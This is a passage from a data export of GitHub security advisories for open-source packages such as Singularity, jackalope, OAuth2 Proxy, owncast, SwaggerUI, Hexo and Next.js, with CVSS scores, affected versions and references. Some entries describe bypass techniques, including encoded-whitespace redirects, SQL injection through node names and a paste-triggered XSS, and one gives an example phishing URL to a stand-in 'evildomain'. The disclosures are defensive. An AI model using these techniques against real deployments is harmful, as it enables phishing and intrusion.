True, 'github_reviewed_at': '2021-03-18T23:36:46Z', 'nvd_published_at': '2021-01-07T00:15:00Z'}" +1.4.0,GHSA-pmfr-63c2-jr5c,2023-01-20T22:02:58Z,2021-12-20T18:24:30Z,,['CVE-2020-13845'],Execution Control List (ECL) Is Insecure in Singularity,"### Impact + +The Singularity Execution Control List (ECL) allows system administrators to set up a policy that defines rules about what signature(s) must be (or must not be) present on a SIF container image for it to be permitted to run. + +In Singularity 3.x versions below 3.6.0, the following issues allow the ECL to be bypassed by a malicious user: + + * Image integrity is not validated when an ECL policy is enforced. + * The fingerprint required by the ECL is compared against the signature object descriptor(s) in the SIF file, rather than to a cryptographically validated signature. Thus, it is trivial to craft an arbitrary payload which will be permitted to run, even if the attacker does not have access to the private key associated with the fingerprint(s) configured in the ECL. + +### Patches + +These issues are addressed in Singularity 3.6.0. + +All users are advised to upgrade to 3.6.0. Note that Singularity 3.6.0 uses a new signature format that is necessarily incompatible with Singularity < 3.6.0 - e.g. Singularity 3.5.3 cannot verify containers signed by 3.6.0. + +Version 3.6.0 includes a `legacyinsecure` option that can be set to `legacyinsecure = true` in `ecl.toml` to allow the ECL to perform verification of the older, and insecure, legacy signatures for compatibility with existing containers. This does not guarantee that containers have not been modified since signing, due to other issues in the legacy signature format. The option should be used only to temporarily ease the transition to containers signed with the new 3.6.0 signature format. + +### Workarounds + +This issue affects any installation of Singularity configured to use the Execution Control List (ECL) functionality. There is no workaround if ECL is required. + +### For more information + +General questions about the impact of the advisory / changes made in the 3.6.0 release can be asked in the: + +* [Singularity Slack Channel](https://bit.ly/2m0g3lX) +* [Singularity Mailing List](https://groups.google.com/a/lbl.gov/forum/??sdf%7Csort:date#!forum/singularity) + +Any sensitive security concerns should be directed to: security@sylabs.io + +See our Security Policy here: https://sylabs.io/security-policy","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/singularity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/security/advisories/GHSA-pmfr-63c2-jr5c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13845'}, {'type': 'WEB', 'url': 'https://medium.com/sylabs'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00046.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00059.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00053.html'}]","{'cwe_ids': ['CWE-347', 'CWE-354'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T19:13:13Z', 'nvd_published_at': '2020-07-14T18:15:00Z'}" +1.4.0,GHSA-ph98-v78f-jqrm,2021-12-14T15:25:41Z,2021-12-14T21:08:13Z,,['CVE-2021-43822'],SQL injection in jackalope/jackalope-doctrine-dbal,"### Impact + +Users can provoke SQL injections if they can specify a node name or query. + +### Patches + +Upgrade to version 1.7.4 + +If that is not possible, you can escape all places where `$property` is used to filter `sv:name` in the class `Jackalope\Transport\DoctrineDBAL\Query\QOMWalker`: `XPath::escape($property)`. + +### Workarounds + +Node names and xpaths can contain `""` or `;` according to the JCR specification. The jackalope component that translates the query object model into doctrine dbal queries does not properly escape the names and paths, so that a accordingly crafted node name can lead to an SQL injection. + +If queries are never done from user input, or if you validate the user input to not contain `;`, you are not affected. + +### References + +No further references. + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in [jackalope/jackalope-doctrine-dbal repo](https://github.com/jackalope/jackalope-doctrine-dbal/issues) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'jackalope/jackalope-doctrine-dbal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jackalope/jackalope-doctrine-dbal/security/advisories/GHSA-ph98-v78f-jqrm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43822'}, {'type': 'WEB', 'url': 'https://github.com/jackalope/jackalope-doctrine-dbal/commit/9d179a36d320330ddb303ea3a7c98d3a33d231db'}, {'type': 'PACKAGE', 'url': 'https://github.com/jackalope/jackalope-doctrine-dbal'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T15:25:41Z', 'nvd_published_at': '2021-12-13T20:15:00Z'}" +1.4.0,GHSA-v4cr-m5f8-gxw8,2021-12-15T15:20:43Z,2021-12-16T14:14:56Z,,['CVE-2021-4092'],yetiforcecrm is vulnerable to Cross-Site Request Forgery (CSRF),yetiforcecrm is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yetiforce/yetiforce-crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4092'}, {'type': 'WEB', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm/commit/585da04bb72d36a894f6ea5939ab909e53fd8c23'}, {'type': 'PACKAGE', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7b58c160-bb62-45fe-ad1f-38354378b89e'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T15:08:25Z', 'nvd_published_at': '2021-12-11T14:15:00Z'}" +1.4.0,GHSA-pfmw-vj74-ph8g,2022-08-10T23:48:33Z,2021-12-02T17:48:30Z,,['CVE-2021-43998'],HashiCorp Vault Incorrect Permission Assignment for Critical Resource,"HashiCorp Vault and Vault Enterprise 0.11.0 up to 1.7.5 and 1.8.4 templated ACL policies would always match the first-created entity alias if multiple entity aliases exist for a specified entity and mount combination, potentially resulting in incorrect policy enforcement. Fixed in Vault and Vault Enterprise 1.7.6, 1.8.5, and 1.9.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '1.7.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.8.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43998'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-30-vaults-templated-acl-policies-matched-first-created-alias-per-entity-and-auth-backend/32132'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202207-01'}]","{'cwe_ids': ['CWE-732'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-01T18:25:18Z', 'nvd_published_at': '2021-11-30T15:15:00Z'}" +1.4.0,GHSA-j7px-6hwj-hpjg,2021-05-24T21:05:58Z,2021-12-20T17:59:10Z,,['CVE-2020-11053'],Open Redirect in OAuth2 Proxy,"### Impact +As users can provide a redirect address for the proxy to send the authenticated user to at the end of the authentication flow. This is expected to be the original URL that the user was trying to access. +This redirect URL is checked within the proxy and validated before redirecting the user to prevent malicious actors providing redirects to potentially harmful sites. + +However, by crafting a redirect URL with HTML encoded whitespace characters (eg. `%0a`, `%0b`,`%09`,`%0d`) the validation could be bypassed and allow a redirect to any URL provided. + +### Patches +@rootxharsh and @iamnoooob provided this patch as potential solution: +``` +From 4b941f56eda310b5c4dc8080b7635a6bfabccad4 Mon Sep 17 00:00:00 2001 +From: Harsh Jaiswal +Date: Fri, 1 May 2020 20:38:31 +0530 +Subject: [PATCH] Fixes redirect issue + +--- + oauthproxy.go | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +diff --git a/oauthproxy.go b/oauthproxy.go +index 1e9bb7c..f8beb4d 100644 +--- a/oauthproxy.go ++++ b/oauthproxy.go +@@ -577,8 +577,9 @@ func validOptionalPort(port string) bool { + + // IsValidRedirect checks whether the redirect URL is whitelisted + func (p *OAuthProxy) IsValidRedirect(redirect string) bool { ++ matched, _ := regexp.MatchString(`^/\s+/|\\`, redirect) + switch { +- case strings.HasPrefix(redirect, ""/"") && !strings.HasPrefix(redirect, ""//"") && !strings.HasPrefix(redirect, ""/\\""): ++ case strings.HasPrefix(redirect, ""/"") && !strings.HasPrefix(redirect, ""//"") && !matched: + return true + case strings.HasPrefix(redirect, ""http://"") || strings.HasPrefix(redirect, ""https://""): + redirectURL, err := url.Parse(redirect) +-- +2.17.1 +``` + +This issue was also reported to us separately by @mik317 several hours later + +The fix was implemented in [#xxx]() and released as version 5.1.1","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/oauth2-proxy/oauth2-proxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-j7px-6hwj-hpjg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11053'}, {'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2-proxy/commit/0d5fa211df8ef2449347a56b22c779eb8d894c43'}]","{'cwe_ids': ['CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:05:58Z', 'nvd_published_at': None}" +1.4.0,GHSA-f9xh-2qgp-cq57,2023-09-14T16:03:37Z,2021-12-09T19:16:42Z,,['CVE-2020-36188'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36188'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2996'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/33d96c13fe18a2dad01b19ce195548c9acea9da4'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:25:02Z', 'nvd_published_at': '2021-01-06T23:15:00Z'}" +1.4.0,GHSA-2hfj-cxw7-g45p,2022-01-04T18:54:05Z,2021-12-14T21:48:16Z,,['CVE-2021-39183'],Unsafe inline XSS in pasting DOM element into chat,"### Impact + +Inline scripts are executed when Javascript is parsed via a paste action. + +1. Open https://watch.owncast.online/ +2. Copy and then paste `` into the +chat field. +3. An alert should pop up. + +### Patches +``` + ⋮ 13 │ // Content security policy + ⋮ 14 │ csp := []string{ + ⋮ 15 │ ""script-src 'self' 'sha256-2HPCfJIJHnY0NrRDPTOdC7AOSJIcQyNxzUuut3TsYRY='"", + ⋮ 16 │ ""worker-src 'self' blob:"", // No single quotes around blob: + ⋮ 17 │ } +``` + +Will be patched in 0.0.9 by blocking `unsafe-inline` Content Security Policy and specifying the `script-src`. The `worker-src` is required to be set to `blob` for the video player. + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [owncast/owncast](https://github.com/owncast/owncast/issues) +* Email us at [gabek@real-ity.com](mailto:gabek@real-ity.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/owncast/owncast'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/owncast/owncast/security/advisories/GHSA-2hfj-cxw7-g45p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39183'}, {'type': 'PACKAGE', 'url': 'https://github.com/owncast/owncast'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T20:16:10Z', 'nvd_published_at': '2021-12-14T20:15:00Z'}" +1.4.0,GHSA-rxch-gp62-574w,2022-01-04T19:01:10Z,2021-12-16T14:13:27Z,,['CVE-2021-4108'],snipe-it is vulnerable to Cross-site Scripting,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4108'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/9d5d1a9f9aae2c8baee48551185da5de0cdb62c2'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5069a037-040e-4d77-8526-846e65edfaf4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-15T15:11:10Z', 'nvd_published_at': '2021-12-14T20:15:00Z'}" +1.4.0,GHSA-q54r-r9pr-w7qv,2023-09-13T19:55:33Z,2021-12-01T18:27:44Z,,['CVE-2021-25987'],Hexo Vulnerable to XSS,Hexo versions 0.0.1 to 5.4.0 are vulnerable against stored XSS. The post “body” and “tags” don’t sanitize malicious javascript during web page generation. Local unprivileged attacker can inject arbitrary code.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'hexo'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.1'}, {'fixed': '6.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.4.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25987'}, {'type': 'WEB', 'url': 'https://github.com/hexojs/hexo/issues/4838'}, {'type': 'WEB', 'url': 'https://github.com/hexojs/hexo/pull/4750'}, {'type': 'WEB', 'url': 'https://github.com/hexojs/hexo/commit/5170df2d3fa9c69e855c4b7c2b084ebfd92d5200'}, {'type': 'PACKAGE', 'url': 'https://github.com/hexojs/hexo'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25987'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-01T16:15:32Z', 'nvd_published_at': '2021-11-30T14:15:00Z'}" +1.4.0,GHSA-5xjx-4xcm-hpcm,2022-07-05T18:01:53Z,2021-12-10T18:53:42Z,,['CVE-2021-23403'],Prototype Pollution in ts-nodash,`ts-nodash` before version 1.2.7 is vulnerable to Prototype Pollution via the Merge() function due to lack of validation input.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'ts-nodash'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23403'}, {'type': 'WEB', 'url': 'https://github.com/BadOPCode/NoDash/commit/b9cc2b3b49f6cd5228e406bc57e17a28b998fea5'}, {'type': 'PACKAGE', 'url': 'https://github.com/BadOPCode/NoDash'}, {'type': 'WEB', 'url': 'https://github.com/BadOPCode/NoDash/blob/master/src/Merge.ts'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TSNODASH-1311009'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-06T14:35:53Z', 'nvd_published_at': '2021-07-02T17:15:00Z'}" +1.4.0,GHSA-hcxx-mp6g-6gr9,2021-12-14T15:51:41Z,2021-12-14T21:43:48Z,,['CVE-2018-16153'],Opencast publishes global system account credentials,"The issue was mostly mitigated before, drastically reducing the risk. See references below for more information. + +### Impact + +Opencast before version 10.6 will try to authenticate against any external services listed in a media package when it is trying to access the files, sending the global system user's credentials, regardless of the target being part of the Opencast cluster or not. + +Previous mitigations already prevented clear text authentications for such requests (e.g. HTTP Basic authentication), but with enough malicious intent, even hashed credentials can be broken. + +### Patches + +Opencast 10.6 will now send authentication requests only against servers which are part of the Opencast cluster, preventing external services from getting any form of authentication attempt in the first place. + +### Workarounds + +No workaround available. + +### References + +- [Patch fixing the issue](https://github.com/opencast/opencast/commit/776d5588f39c61eb04c03bb955416c4f77629d51) +- [Original security notice](https://groups.google.com/a/opencast.org/g/security-notices/c/XRZzRiqp-NE) +- [Original security mitigation](https://github.com/opencast/opencast/commit/fe8c3d3a60dc5869b468957270dbad5f8c30ead6) + +### For more information + +If you have any questions or comments about this advisory: +- Open an issue in [our issue tracker](https://github.com/opencast/opencast/issues) +- Email us at [security@opencast.org](mailto:security@opencast.org) +",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.opencastproject:opencast-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencast/opencast/security/advisories/GHSA-hcxx-mp6g-6gr9'}, {'type': 'WEB', 'url': 'https://github.com/opencast/opencast/commit/776d5588f39c61eb04c03bb955416c4f77629d51'}, {'type': 'WEB', 'url': 'https://docs.opencast.org/r/10.x/admin/#changelog/#opencast-106'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencast/opencast'}]","{'cwe_ids': ['CWE-200', 'CWE-522'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T15:51:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-qrmm-w75w-3wpx,2022-05-26T20:08:34Z,2021-12-09T19:08:38Z,,[],Server side request forgery in SwaggerUI,"SwaggerUI supports displaying remote OpenAPI definitions through the `?url` parameter. This enables robust demonstration capabilities on sites like `petstore.swagger.io`, `editor.swagger.io`, and similar sites, where users often want to see what their OpenAPI definitions would look like rendered. + +However, this functionality may pose a risk for users who host their own SwaggerUI instances. In particular, including remote OpenAPI definitions opens a vector for phishing attacks by abusing the trusted names/domains of self-hosted instances. + +An example scenario abusing this functionality could take the following form: +- `https://example.com/api-docs` hosts a version of SwaggerUI with `?url=` query parameter enabled. +- Users will trust the domain `https://example.com` and the contents of the OpenAPI definition. +- A malicious actor may craft a similar OpenAPI definition and service that responds to the defined APIs at `https://evildomain`. +- Users mistakenly click a phishing URL like `https://example.com/api-docs?url=https://evildomain/fakeapi.yaml` and enters sensitive data via the ""Try-it-out"" feature. + +We do want to stress that this attack vector is limited to scenarios that actively trick users into divulging sensitive information. The ease of this is highly contextual and, therefore, the threat model may be different for individual users and organizations. It is *not* possible to perform non-interactive attacks (e.g., cross-site scripting or code injection) through this mechanism. + +### Resolution +We've made the decision to [disable query parameters (#4872)](https://github.com/swagger-api/swagger-ui/issues/4872) by default starting with SwaggerUI version `4.1.3`. Please update to this version when it becomes available (**ETA: 2021 December**). Users will still be able to be re-enable the options at their discretion. We'll continue to enable query parameters on the Swagger demo sites. + +### Workaround +If you host a version of SwaggerUI and wish to mitigate this issue immediately, you are encouraged to add the following custom plugin code: + +```js +SwaggerUI({ + // ...other configuration options, + plugins: [function UrlParamDisablePlugin() { + return { + statePlugins: { + spec: { + wrapActions: { + // Remove the ?url parameter from loading an external OpenAPI definition. + updateUrl: (oriAction) => (payload) => { + const url = new URL(window.location.href) + if (url.searchParams.has('url')) { + url.searchParams.delete('url') + window.location.replace(url.toString()) + } + return oriAction(payload) + } + } + } + } + } + }], +}) +``` + +### Future UX work + +Through the exploration of this issue, it became apparent that users may not be aware to which web server the Try-it-out function will send requests. While this information is currently presented at the top of the page, understanding may improve by displaying it closer to the ""Execute"" button where requests are actually made. We'll be exploring these UX improvements over the coming months and welcome community input. Please create a Feature Request under the GitHub Issue tab to start a conversation with us and the community. + +## Reflected XSS attack + +**Warning** in versions < 3.38.0, it is possible to combine the URL options (as mentioned above) with a vulnerability in DOMPurify (https://www.cvedetails.com/cve/CVE-2020-26870/) to create a reflected XSS vector. If your version of Swagger UI is older than 3.38.0, we suggest you upgrade or implement the workaround as mentioned above. +",[],"[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'swagger-ui-dist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'swagger-ui-react'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.3'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Swashbuckle.AspNetCore.SwaggerUI'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/security/advisories/GHSA-qrmm-w75w-3wpx'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/issues/4872'}, {'type': 'WEB', 'url': 'https://github.com/domaindrivendev/Swashbuckle.AspNetCore/commit/401c7cb81e5efe835ceb8aae23e82057d57c7d29'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/commit/01a3e55960f864a0acf6a8d06e5ddaf6776a7f76'}, {'type': 'PACKAGE', 'url': 'https://github.com/swagger-api/swagger-ui'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-09T17:49:08Z', 'nvd_published_at': None}" +1.4.0,GHSA-m9hp-7r99-94h5,2021-05-21T20:49:36Z,2021-12-20T17:53:53Z,,['CVE-2020-26290'],Critical security issues in XML encoding in github.com/dexidp/dex,"### Impact + +The following vulnerabilities have been disclosed, which impact users leveraging the SAML connector: + +Signature Validation Bypass (CVE-2020-15216): https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7 + +`encoding/xml` instabilities: + - [Element namespace prefix instability (CVE-2020-29511)](https://github.com/mattermost/xml-roundtrip-validator/blob/master/advisories/unstable-elements.md) + - [Attribute namespace prefix instability (CVE-2020-29509)](https://github.com/mattermost/xml-roundtrip-validator/blob/master/advisories/unstable-attributes.md) + - [Directive comment instability (CVE-2020-29510)](https://github.com/mattermost/xml-roundtrip-validator/blob/master/advisories/unstable-directives.md) + +### Patches + +Immediately update to [Dex v2.27.0](https://github.com/dexidp/dex/releases/tag/v2.27.0). + +### Workarounds + +There are no known workarounds.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/dexidp/dex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.27.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/dexidp/dex/connector/saml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.27.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/russellhaering/goxmldsig'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dexidp/dex/security/advisories/GHSA-m9hp-7r99-94h5'}, {'type': 'WEB', 'url': 'https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26290'}, {'type': 'WEB', 'url': 'https://github.com/dexidp/dex/commit/324b1c886b407594196113a3dbddebe38eecd4e8'}, {'type': 'WEB', 'url': 'https://github.com/russellhaering/goxmldsig/commit/f6188febf0c29d7ffe26a0436212b19cb9615e64'}, {'type': 'WEB', 'url': 'https://github.com/dexidp/dex/releases/tag/v2.27.0'}, {'type': 'WEB', 'url': 'https://github.com/mattermost/xml-roundtrip-validator/blob/master/advisories/unstable-attributes.md'}, {'type': 'WEB', 'url': 'https://github.com/mattermost/xml-roundtrip-validator/blob/master/advisories/unstable-directives.md'}, {'type': 'WEB', 'url': 'https://github.com/mattermost/xml-roundtrip-validator/blob/master/advisories/unstable-elements.md'}, {'type': 'WEB', 'url': 'https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0050'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T20:49:36Z', 'nvd_published_at': None}" +1.4.0,GHSA-25mp-g6fv-mqxx,2022-04-07T16:06:54Z,2021-12-07T21:12:09Z,,['CVE-2021-43803'],Unexpected server crash in Next.js.,"Next.js is a React framework. In versions of Next.js prior to 12.0.5 or 11.1.3, invalid or malformed URLs could lead to a server crash. In order to be affected by this issue, the deployment must use Next.js versions above 11.1.0 and below 12.0.5, Node.js above 15.0.0, and next start or a custom server. Deployments on Vercel are not affected, along with similar environments where invalid requests are filtered before reaching Next.js. Versions 12.0.5 and 11.1.3 contain patches for this issue. Note that prior version 0.9.9 package `next` hosted a different utility (0.4.1 being the latest version of that codebase), and this advisory does not apply to those versions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'next'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.0.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'next'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.9'}, {'fixed': '11.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vercel/next.js/security/advisories/GHSA-25mp-g6fv-mqxx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43803'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/pull/32080'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/commit/6d98b4fb4315dec1badecf0e9bdc212a4272b264'}, {'type': 'PACKAGE', 'url': 'https://github.com/vercel/next.js'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/releases/tag/v11.1.3'}, {'type': 'WEB', 'url': 'https://github.com/vercel/next.js/releases/v12.0.5'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T19:17:55Z', 'nvd_published_at': 